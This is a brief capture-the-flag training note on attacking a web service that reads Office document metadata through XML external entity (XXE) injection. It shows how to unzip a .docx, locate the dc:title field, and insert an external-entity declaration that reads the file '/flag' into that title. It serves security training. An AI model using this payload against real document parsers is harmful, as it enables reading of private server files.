Firebird - M$Office Meta Reader

tags: [[CTF]] [[firebird training]] [[XXE]]

Firebird Homework 9-B M$Office Meta Reader

Test for Injection Point

  1. from here, learn to read xml of a .docx file: unzip xxe.docx

  2. grep -nr 'test1*' . -> dc:titletest1</dc:title>

  3. injection:

    1. <!DOCTYPE replace [<!ENTITY injection SYSTEM "/flag"> ]>

    2. replace to <dc:title>&injection;</dc:title>

PreviousFirebird - Secret CodeNextFirebird - Office Meta Reader 2

Last updated